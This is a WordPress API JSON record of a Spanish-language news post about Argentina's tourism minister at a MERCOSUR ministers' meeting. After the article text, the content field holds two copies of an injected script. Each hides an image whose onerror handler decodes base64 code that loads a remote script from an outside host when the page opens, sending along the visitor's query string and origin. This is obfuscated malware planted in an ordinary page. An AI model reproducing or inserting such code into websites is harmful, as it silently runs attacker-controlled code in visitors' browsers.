{"id":2690,"date":"2023-06-05T08:35:43","date_gmt":"2023-06-05T11:35:43","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2690"},"modified":"2025-08-14T00:15:51","modified_gmt":"2025-08-14T03:15:51","slug":"lammens-participo-de-la-xxviii-reunion-de-ministros-de-turismo-del-mercosur","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2690","title":{"rendered":"Lammens particip\u00f3 de la XXVIII Reuni\u00f3n de Ministros de Turismo del MERCOSUR"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#08537e\"><em>\u201cTenemos que seguir aunando esfuerzos para promocionar a la regi\u00f3n de manera conjunta\u201d, asegur\u00f3 el ministro<\/em><\/h3>\n\n\n\n<p>El ministro de Turismo y Deportes de la Naci\u00f3n,&nbsp;<strong>Mat\u00edas Lammens<\/strong>, particip\u00f3 de la&nbsp;<strong>XXVIII Reuni\u00f3n de Ministros de Turismo del MERCOSUR<\/strong>, donde destac\u00f3 la r\u00e1pida recuperaci\u00f3n del turismo receptivo y resalt\u00f3 la promoci\u00f3n conjunta regional en mercados lejanos.<\/p>\n\n\n\n<p><em>\u201cYa no hablamos de recuperaci\u00f3n sino de crecimiento del turismo receptivo en la Argentina. Primero, apuntamos a fortalecer la llegada de visitantes de pa\u00edses lim\u00edtrofes en la pospandemia. En una segunda instancia, con Norteam\u00e9rica. Y ahora estamos promoviendo la recuperaci\u00f3n de turistas desde Europa\u201d<\/em>, asegur\u00f3&nbsp;<strong>Lammens<\/strong>, acompa\u00f1ado por el subsecretario de Relaciones Institucionales y Cooperaci\u00f3n Internacional,&nbsp;<strong>Leandro Balasini<\/strong>, y la Directora de Relaciones Internacionales,&nbsp;<strong>Ana Garc\u00eda Allievi<\/strong>.<\/p>\n\n\n\n<p>Adem\u00e1s, el ministro realiz\u00f3 un repaso de los eventos deportivos en el pa\u00eds, como&nbsp;<strong>el Mundial Sub-20, los World Skate Games, el Gran Premio de Argentina del MotoGP<\/strong>&nbsp;y la candidatura conjunta con Uruguay, Chile y Paraguay para ser sede conjunta del&nbsp;<strong>Mundial 2030<\/strong>. Y finaliz\u00f3:&nbsp;<em>\u201cTenemos que seguir trabajando en la marca \u2018Visit South America\u2019, aunando esfuerzos para posicionarla, con el objetivo de potenciar y promocionar a la regi\u00f3n, de manera conjunta, en destinos lejanos\u201d<\/em>.<\/p>\n\n\n\n<p>Durante la jornada, se trataron diferentes iniciativas conjuntas, como los avances en materia de promoci\u00f3n tur\u00edstica de la marca&nbsp;<strong>Visit South Am\u00e9rica, La Ruta Natural del Sur y El Camino de los Jesuitas en Sudam\u00e9rica<\/strong>. Adem\u00e1s, se disert\u00f3 sobre la facilitaci\u00f3n tur\u00edstica en fronteras terrestres y las inversiones tur\u00edsticas en la regi\u00f3n.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>\u201cTenemos que seguir aunando esfuerzos para promocionar a la regi\u00f3n de manera conjunta\u201d, asegur\u00f3 el ministro El ministro de Turismo y Deportes de la Naci\u00f3n,&nbsp;Mat\u00edas Lammens, particip\u00f3 de la&nbsp;XXVIII Reuni\u00f3n de Ministros de Turismo del MERCOSUR, donde destac\u00f3 la r\u00e1pida recuperaci\u00f3n del turismo receptivo y resalt\u00f3 la promoci\u00f3n conjunta regional en mercados lejanos. \u201cYa no [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2691,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[22],"tags":[],"class_list":{"0":"post-2690","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-internacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2690"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2690"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2690\/revisions"}],"predecessor-version":[{"id":7069,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2690\/revisions\/7069"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2691"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2690"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2690"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2690"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}